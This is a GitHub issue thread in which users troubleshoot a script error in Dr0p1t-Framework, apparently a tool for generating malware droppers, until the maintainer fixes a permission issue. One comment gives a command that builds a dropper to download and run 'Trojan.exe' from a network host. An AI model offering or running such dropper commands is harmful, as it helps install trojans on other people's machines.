### ISSUE TITLE
Failed To Excute Script

### ISSUE THREAD

**Issue by hunterx101** [D4Vinci/Dr0p1t-Framework#25]
when i run file on windows 7 don't run and give message failed to excute script.

**Comment by tugdualnicolas** [comment]
Show the command you done to get this Error. 

_Sent from my OnePlus ONEPLUS A3003 using [FastHub](https://play.google.com/store/apps/details?id=com.fastaccess.github)_

**Comment by D4Vinci** [comment]
Any details or how I could help you !?

**Comment by sh4dyrul3zz** [comment]
Getting this error everytime
![screenshot from 2017-08-01 14-41-10](https://user-images.githubusercontent.com/25161116/28818113-d0a57c36-76c7-11e7-8ff1-7aba9f7175a1.png)

**Comment by D4Vinci** [comment]
What's the command you use ?

**Comment by Bry-fi** [comment]
I have encountered the same error. And for the command I use is ./Dr0p1t.py http://192.168.1.12/Trojan.exe

**Comment by D4Vinci** [comment]
Seems like it's some typo in the new downloading function I added 9 days ago.
I will review the code when I have time ASAP.

**Comment by tugdualnicolas** [comment]
I got the same error 
![sans titre](https://user-images.githubusercontent.com/18290364/28918650-79d0611c-784a-11e7-95b5-0d887da1893f.png)

**Comment by hunterx101** [comment]
![test](https://user-images.githubusercontent.com/27423360/28933199-8be6213e-787c-11e7-87a1-3320c8687d6f.png)

**Comment by D4Vinci** [comment]
Fixed and updated, check it out!

**Comment by tugdualnicolas** [comment]
Still have the issue...

**Comment by D4Vinci** [comment]
Issue was with no logical reason at first but it worked when I rewritten the code but now there's no issue trust me and try again several options like changing the website you have uploaded to ,rebooting your machine etc..

**Comment by D4Vinci** [comment]
After testing on many devices found that the issue is still there!
After many digging and testing found it's a permission issue now I fixed it
Sorry guys..

**Comment by fl1rty** [comment]
Tried everything, but couldn't get it work, in the end Thank You very much !!!!

**Comment by D4Vinci** [comment]
See my tutorial here :
https://youtu.be/A7r1rKlAHZg
